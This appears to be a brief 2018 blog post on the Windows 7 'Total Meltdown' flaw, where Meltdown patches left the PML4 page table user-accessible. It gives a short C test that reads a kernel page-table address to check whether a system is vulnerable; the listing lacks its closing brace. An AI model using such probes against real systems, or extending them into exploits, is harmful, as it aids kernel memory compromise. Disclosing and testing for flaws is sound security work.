Total Meltdown - Windows 7

March 27, 2018    Article    134 words    1 min read

Did you hear about the newest bug in Windows 7, introduced by the Meltdown patches that Microsoft implemented? Accidentally leaving the Page-Map Level 4 (PML4) as user?

A simple user-space application that tried to read a kernel address should’ve crashed, how about this for a basic test, Microsoft?

#include <stdio.h>
int main() {
    volatile unsigned long *ptr = (volatile unsigned long *)0xFFFFF6FB7DBED000;
    printf("%lu\n", *ptr);
    return 0;

Compile with Cygwin and run. If it doesn’t crash, the new Windows 7 Meltdown bug is present.

The real question is, I guess, how do you accidentally make PML4 user. Oh, and if you’re wondering why this only affects Windows 7, it’s easy: parts of the memory management code were rewritten for Windows 10 so that the location of the page tables could be randomised.

Have fun.